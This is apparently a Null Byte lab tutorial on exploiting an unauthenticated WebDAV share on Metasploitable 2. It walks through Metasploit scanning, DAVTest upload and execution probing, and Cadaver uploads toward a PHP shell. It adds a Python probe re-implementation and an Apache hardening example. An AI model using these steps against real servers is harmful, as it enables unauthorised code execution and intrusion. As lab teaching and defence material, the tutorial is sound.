
How to use WebDAV on a server and get a shell «Null Byte :: WonderHowTo



The internet has changed the way we work and communicate: collaborating with people anywhere in the world is now routine. That convenience carries security risk, because anything reachable from anywhere is also reachable by attackers looking to turn it to their own ends.

WebDAV, or Web Distributed Authoring and Versioning, is a protocol that lets users collaboratively author and edit content on a web server. It is an extension of HTTP: it adds its own methods (such as PROPFIND, MKCOL, COPY, MOVE, LOCK and UNLOCK) and headers on top of the standard HTTP ones.

Although it is mainly used for remote editing and collaboration, WebDAV also works as a plain file-transfer mechanism. Because it rides on HTTP it usually listens on port 80, or on 443 when served over TLS. The feature that makes it convenient, the ability to write to the web root from anywhere, becomes a serious vulnerability when the share is writable without authentication, and worse still when the server will also execute whatever is uploaded.

In this tutorial we use Metasploitable 2 as the target and Kali Linux as the attacking machine. A similar setup is all you need to follow along.

Step 1: Check if WebDAV Is Enabled

The first thing to do is check whether WebDAV is enabled on the target. Metasploit has a scanner for this, so start it by typing msfconsole in a terminal, then locate the module with the search command:

  msf5 > search webdav

Matching Modules
================

   #   Name                                                       Disclosure Date  Rank       Check  Description
   -   ----                                                       ---------------  ----       -----  -----------
   0   auxiliary/scanner/http/dir_webdav_unicode_bypass                            normal     Yes    MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
   1   auxiliary/scanner/http/ms09_020_webdav_unicode_bypass                       normal     Yes    MS09-020 IIS6 WebDAV Unicode Authentication Bypass
   2   auxiliary/scanner/http/webdav_internal_ip                                   normal     Yes    HTTP WebDAV Internal IP Scanner
   3   auxiliary/scanner/http/webdav_scanner                                       normal     Yes    HTTP WebDAV Scanner
   4   auxiliary/scanner/http/webdav_website_content                               normal     Yes    HTTP WebDAV Website Content Scanner
   5   exploit/multi/http/sun_jsws_dav_options                    2010-01-20       great      Yes    Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
   6   exploit/multi/svn/svnserve_date                            2004-05-19       average    No     Subversion Date Svnserve
   7   exploit/osx/browser/safari_file_policy                     2011-10-12       normal     No     Apple Safari file:// Arbitrary Code Execution
   8   exploit/windows/browser/java_ws_arginject_altjvm           2010-04-09       excellent  No     Sun Java Web Start Plugin Command Line Argument Injection
   9   exploit/windows/browser/java_ws_double_quote               2012-10-16       excellent  No     Sun Java Web Start Double Quote Injection
   10  exploit/windows/browser/java_ws_vmargs                     2012-02-14       excellent  No     Sun Java Web Start Plugin Command Line Argument Injection
   11  exploit/windows/browser/keyhelp_launchtripane_exec         2012-06-26       excellent  No     KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability
   12  exploit/windows/browser/ms07_017_ani_loadimage_chunksize   2007-03-28       great      No     Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
   13  exploit/windows/browser/ms10_022_ie_vbscript_winhlp32      2010-02-26       great      No     MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution
   14  exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec      2010-06-09       excellent  No     Microsoft Help Center XSS and Command Execution
   15  exploit/windows/browser/ms10_046_shortcut_icon_dllloader   2010-07-16       excellent  No     Microsoft Windows Shell LNK Code Execution
   16  exploit/windows/browser/oracle_webcenter_checkoutandopen   2013-04-16       excellent  No     Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution
   17  exploit/windows/browser/ubisoft_uplay_cmd_exec             2012-07-29       normal     No     Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution
   18  exploit/windows/browser/webdav_dll_hijacker                2010-08-18       manual     No     WebDAV Application DLL Hijacker
   19  exploit/windows/http/sap_host_control_cmd_exec             2012-08-14       average    Yes    SAP NetWeaver HostControl Command Injection
   20  exploit/windows/http/xampp_webdav_upload_php               2012-01-14       excellent  No     XAMPP WebDAV PHP Upload
   21  exploit/windows/iis/iis_webdav_scstoragepathfromurl        2017-03-26       manual     Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow
   22  exploit/windows/iis/iis_webdav_upload_asp                  2004-12-31       excellent  No     Microsoft IIS WebDAV Write Access Code Execution
   23  exploit/windows/iis/ms03_007_ntdll_webdav                  2003-05-30       great      Yes    MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
   24  exploit/windows/local/ms16_016_webdav                      2016-02-09       excellent  Yes    MS16-016 mrxdav.sys WebDav Local Privilege Escalation
   25  exploit/windows/misc/ibm_director_cim_dllinject            2009-03-10       excellent  Yes    IBM System Director Agent DLL Injection
   26  exploit/windows/misc/vmhgfs_webdav_dll_sideload            2016-08-05       normal     No     DLL Side Loading Vulnerability in VMware Host Guest Client Redirector
   27  exploit/windows/misc/webdav_delivery                       1999-01-01       manual     No     Serve DLL via webdav server
   28  exploit/windows/scada/ge_proficy_cimplicity_gefebt         2014-01-23       excellent  Yes    GE Proficy CIMPLICITY gefebt.exe Remote Code Execution
   29  exploit/windows/ssl/ms04_011_pct                           2004-04-13       average    No     MS04-011 Microsoft Private Communications Transport Overflow
   30  post/windows/escalate/droplnk                                               normal     No     Windows Escalate SMB Icon LNK Dropper

We want the webdav_scanner module, so load it with the use command:

  msf5 > use auxiliary/scanner/http/webdav_scanner

Now we can view the options for this module:

  msf5 auxiliary(scanner/http/webdav_scanner) > options

Module options (auxiliary/scanner/http/webdav_scanner):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /                yes       Path to use
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

Now set the path to /dav/, a directory commonly used for WebDAV shares:

  msf5 auxiliary(scanner/http/webdav_scanner) > set path /dav/

path => /dav/

Then we can set rhosts to the IP address of our target:

  msf5 auxiliary (scanner / http / webdav_scanner)> set rhosts 10.10.0.50

rhosts => 10.10.0.50 

We should be good to go, so type run to start the module:

  msf5 auxiliary(scanner/http/webdav_scanner) > run

[+] 10.10.0.50 (Apache/2.2.8 (Ubuntu) DAV/2) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The scanner returns some HTTP information, including the Apache version banner and whether WebDAV is enabled. (Under the hood it sends an OPTIONS request and looks for a DAV header in the response.) As we can see above, WebDAV is indeed turned on for our target.

Step 2: Test File Permissions with DAVTest

The next thing to do is test what the server lets us upload and, more importantly, which of those file types it will execute. Remember that our ultimate goal is a reverse shell, so we need to know what we are up against.

DAVTest is a handy tool that automates these checks. Type davtest in the terminal to see its help and usage:

  ~# davtest

ERROR: Missing -url

/usr/bin/davtest -url <url> [options]

 -auth+        Authorization (user:password)
 -cleanup      delete everything uploaded when done
 -directory+   postfix portion of directory to create
 -debug+       DAV debug level 1-3 (2 & 3 log req/resp to /tmp/perldav_debug.txt)
 -move         PUT text files then MOVE to executable
 -nocreate     don't create a directory
 -quiet        only print summary
 -rand+        use this instead of a random string for filenames
 -sendbd+      send backdoors:
   auto - for any succeeded test
   ext - extension matching file name(s) in backdoors/ dir
 -uploadfile+  upload this file (requires -uploadloc)
 -uploadloc+   upload file to this location/name (requires -uploadfile)
 -url+         url of DAV location

Example: /usr/bin/davtest -url http://localhost/davdir

At the most basic level we only need to give it a URL pointing at the WebDAV share, using the -url switch.

Below, the tool does its work. It starts by testing the connection and creating a test directory, which succeeds. It then uploads test files of various types to find out what can be written; here every PUT succeeds. Finally it requests each file back to see which ones the server actually executes. Note the -cleanup option: without it, all of these test files stay on the target.

  ~# davtest -url http://10.10.0.50/dav

********************************************************
 Testing DAV connection
OPEN            SUCCEED:        http://10.10.0.50/dav
********************************************************
NOTE    Random string for this session: 6WDIVTY
********************************************************
 Creating directory
MKCOL           SUCCEED:        Created http://10.10.0.50/dav/DavTestDir_6WDIVTY
********************************************************
 Sending test files
PUT     asp     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.asp
PUT     txt     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
PUT     php     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
PUT     jhtml   SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jhtml
PUT     aspx    SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.aspx
PUT     cgi     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cgi
PUT     shtml   SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.shtml
PUT     cfm     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cfm
PUT     html    SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
PUT     jsp     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jsp
PUT     pl      SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.pl
********************************************************
 Checking for test file execution
EXEC    asp     FAIL
EXEC    txt     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
EXEC    php     SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
EXEC    jhtml   FAIL
EXEC    aspx    FAIL
EXEC    cgi     FAIL
EXEC    shtml   FAIL
EXEC    cfm     FAIL
EXEC    html    SUCCEED:        http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
EXEC    jsp     FAIL
EXEC    pl      FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.0.50/dav/DavTestDir_6WDIVTY
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.asp
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jhtml
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.aspx
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cgi
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.shtml
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.cfm
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.jsp
PUT File: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.pl
Executed: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.txt
Executed: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.php
Executed: http://10.10.0.50/dav/DavTestDir_6WDIVTY/davtest_6WDIVTY.html

At the end of the output we see the interesting part: the execution tests. Most fail, but TXT, HTML and, most importantly for us, PHP files are all reported as executed. For TXT and HTML "executed" only means the server serves the file back as-is; for PHP it means the server ran our code, which is what gives us remote code execution. All we have to do now is find a way to upload our shell.

Step 3: Upload the shell with Cadaver

For the final phase of our attack we use a tool called Cadaver, which provides an easy-to-use, FTP-like command-line interface to a WebDAV service.

We can view the help and usage information by typing cadaver -h in the terminal:

  ~# cadaver -h

Usage: cadaver [OPTIONS] http://hostname[:port]/path
  Port defaults to 80, path defaults to '/'
Options:
  -t, --tolerant            Allow cd/open into non-WebDAV enabled collection.
  -r, --rcfile=FILE         Read script from FILE instead of ~/.cadaverrc.
  -p, --proxy=PROXY[:PORT]  Use proxy host PROXY and optional proxy port PORT.
  -V, --version             Display version information.
  -h, --help                Display this help message.
Please send bug reports and feature requests to

Let's test it with a harmless text file before uploading our shell. First create a simple text file:

  root@drd:~# echo 'TESTING' > test.txt

We can then connect to the WebDAV share with Cadaver by giving it the URL:

  ~# cadaver http://10.10.0.50/dav

dav:/dav/>

Type ? or help at the prompt for a list of available commands:

  dav:/dav/> ?

Available commands:
 ls         cd         pwd        put        get        mget       mput
 edit       less       mkcol      cat        delete     rmcol      copy
 move       lock       unlock     discover   steal      showlocks  version
 checkin    checkout   uncheckout history    label      propnames  chexec
 propget    propdel    propset    search     set        open       close
 echo       quit       unset      lcd        lls        lpwd       logout
 help       describe   about
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye

We can use the put command to upload our test file:

  dav:/dav/> put test.txt

Uploading test.txt to `/dav/test.txt':
Progress: [=============================>] 100.0% of 8 bytes succeeded.

If we now browse to http://10.10.0.50/dav/test.txt, we should see the text displayed. A PHP shell is uploaded exactly the same way; the only difference is that, as DAVTest showed, the server will execute it when we request it.
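As an added, runnable example (not code from the article, and not from Metasploit, DAVTest or Cadaver), the block below re-implements the three steps at the protocol level: the OPTIONS probe that webdav_scanner relies on (Step 1), the MKCOL/PUT/GET loop that DAVTest performs (Step 2), and the plain PUT that cadaver's put command sends (Step 3). Because no Metasploitable target is available offline, it talks to a constructed in-process stand-in whose behaviour is entirely an assumption for this example: it advertises DAV: 1,2, accepts anonymous MKCOL and PUT under /dav/, serves uploads back verbatim, and simulates mod_php only for a trivial echo in .php files. The probe bodies and the extension list are likewise constructed. Run it and you get the same SUCCEED/FAIL pattern for txt, html and php that the article's DAVTest output shows.

```python
"""Added example: a minimal webdav_scanner + DAVTest re-implementation against a
constructed stand-in target. Nothing here is the real tools' code."""
import http.client
import re
import secrets
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Extensions in the order DAVTest tried them in the article's output (assumed list).
DAVTEST_EXTS = ["asp", "txt", "php", "jhtml", "aspx", "cgi", "shtml", "cfm", "html", "jsp", "pl"]
PHP_ECHO = re.compile(r"<\?php\s+echo\s+'([^']*)';\s*\?>")


class StandInDav(BaseHTTPRequestHandler):
    """Constructed stand-in for the misconfigured target (hypothetical, not a real DAV server)."""
    server_version, sys_version = "Apache/2.2.8 (Ubuntu)", "DAV/2"  # banner like the article's
    store = {}  # uploaded path -> bytes, shared across requests on purpose

    def log_message(self, *_):
        pass

    def _reply(self, code, body=b"", headers=()):
        self.send_response(code)
        for k, v in headers:
            self.send_header(k, v)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):  # the DAV header is what the scanner keys on
        self._reply(200, headers=[("DAV", "1,2"), ("Allow",
            "OPTIONS,GET,HEAD,POST,DELETE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK,PUT,MKCOL")])

    def do_MKCOL(self):
        self._reply(201 if self.path.startswith("/dav/") else 403)

    def do_PUT(self):  # no authentication: the misconfiguration the article exploits
        if not self.path.startswith("/dav/"):
            return self._reply(403)
        self.store[self.path] = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        self._reply(201)

    def do_GET(self):
        body = self.store.get(self.path)
        if body is None:
            return self._reply(404)
        if self.path.endswith(".php"):  # simulate mod_php: run the trivial echo, serve its output
            m = PHP_ECHO.search(body.decode(errors="replace"))
            body = (m.group(1) if m else "").encode()
        self._reply(200, body)  # everything else is served back verbatim


def start_stand_in():
    srv = ThreadingHTTPServer(("127.0.0.1", 0), StandInDav)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def _request(conn, method, path, body=None):
    conn.request(method, path, body=body)
    resp = conn.getresponse()
    data = resp.read()  # drain the body so the connection can be reused
    return resp.status, resp, data


def webdav_enabled(host, port, path="/dav/"):
    """Step 1, the way webdav_scanner does it: send OPTIONS and look for a DAV header."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    status, resp, _ = _request(conn, "OPTIONS", path)
    conn.close()
    allow = {m.strip() for m in (resp.getheader("Allow") or "").split(",")}
    return {"enabled": status == 200 and resp.getheader("DAV") is not None,
            "server": resp.getheader("Server"),
            "write_methods": sorted(allow & {"PUT", "MKCOL", "MOVE", "COPY", "DELETE"})}


def probe_body(ext, marker):
    """Source that prints exactly `marker` if the server interprets that extension (constructed)."""
    return {"txt": marker, "html": marker,  # served verbatim these already equal the marker
            "php": f"<?php echo '{marker}'; ?>",
            "asp": f'<% Response.Write("{marker}") %>',
            "jsp": f'<% out.print("{marker}"); %>',
            "cgi": f"#!/bin/sh\necho 'Content-Type: text/plain'\necho\necho '{marker}'",
            }.get(ext, f"<!-- {marker} -->")  # generic placeholder for the other extensions


def davtest(host, port, base="/dav", exts=DAVTEST_EXTS):
    """Step 2 (and the PUT of Step 3): MKCOL a test dir, PUT one probe per extension, GET it back.
    'exec' is true only when the response is the rendered marker, not the source we uploaded."""
    tag = secrets.token_hex(4)
    marker = f"davtest_{tag}"
    testdir = f"{base}/DavTestDir_{tag}"
    conn = http.client.HTTPConnection(host, port, timeout=5)
    if _request(conn, "MKCOL", testdir)[0] not in (200, 201):
        conn.close()
        return None
    results = {}
    for ext in exts:
        path = f"{testdir}/{marker}.{ext}"
        put_ok = _request(conn, "PUT", path, probe_body(ext, marker).encode())[0] in (200, 201, 204)
        status, _, data = _request(conn, "GET", path)
        results[ext] = {"put": put_ok,
                        "exec": put_ok and status == 200 and data.strip() == marker.encode()}
    conn.close()
    return results


if __name__ == "__main__":
    srv, port = start_stand_in()
    print(webdav_enabled("127.0.0.1", port))
    for ext, r in davtest("127.0.0.1", port).items():
        print(f"PUT {ext:6} {'SUCCEED' if r['put'] else 'FAIL':8} EXEC {'SUCCEED' if r['exec'] else 'FAIL'}")
    srv.shutdown()
```

Pointed at a real lab host and port, webdav_enabled and davtest do the same thing the article's tools do, minus DAVTest's backdoor upload and cleanup features. The distinction to keep in mind is the one the exec check encodes: txt and html count as "executed" because the server returns them unchanged, whereas php counts because the server ran it, and only the latter is code execution.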

Wrapping Up

In this tutorial we learned what WebDAV is and how a misconfigured instance can be exploited to get shell access. First we used a Metasploit scanner to determine whether WebDAV was active on the target. We then tested the upload and execution policy with DAVTest, which told us the server runs uploaded PHP. Finally, we used Cadaver to upload a file to the share; a PHP reverse shell uploaded the same way and then requested in the browser compromises the server. Remote authoring is a convenient way to collaborate, but an anonymous, executable share is an open door, and attackers will walk through it.
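The root cause of everything above is configuration, so as an added illustration (not part of the original tutorial, and not a copy of the Metasploitable 2 configuration) here is what an anonymous, executable WebDAV share typically looks like in Apache, beside a hardened equivalent. Paths, the password file, the lock database location and the Apache 2.4 access-control syntax are assumptions for the illustration; the two independent fixes, requiring authentication for writes and never executing anything in the share, are the point.

```apache
# --- Weak (assumed, illustrative): behaves like the article's target ---
# Anonymous clients may MKCOL/PUT into the share, and PHP uploaded there runs.
Alias /dav /var/www/dav
<Directory /var/www/dav>
    DAV On
    AllowOverride All          # an uploaded .htaccess can re-enable any handler
    Require all granted        # no authentication at all
</Directory>

# --- Hardened (assumed, illustrative): same share, two independent fixes ---
DavLockDB /var/lock/apache2/DavLock   # mod_dav_fs needs a lock database (server context)
Alias /dav /var/www/dav
<Directory /var/www/dav>
    DAV On
    # Fix 1: no anonymous writes. Basic auth sends credentials in the clear, so HTTPS only.
    SSLRequireSSL
    AuthType Basic
    AuthName "WebDAV"
    AuthUserFile /etc/apache2/dav.passwd
    Require valid-user
    # Fix 2: nothing in the share is ever executed, even by authenticated users.
    php_admin_flag engine off        # mod_php; with php-fpm override the proxy SetHandler too
    RemoveHandler .php .phtml .php3 .phar .cgi .pl .shtml
    RemoveType .php .phtml .php3 .phar
    Options -ExecCGI -Includes
    AllowOverride None               # uploads cannot bring their own .htaccess
</Directory>
```

After such a change, re-running DAVTest should show every EXEC line as FAIL (and, once credentials are required, the PUTs failing without -auth). The DAVTest output in Step 2 is therefore a cheap regression check for the share's configuration, not only an attacker's tool.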

Cover image by Pixabay / Pexels; Screenshots of drd_ / Null Byte
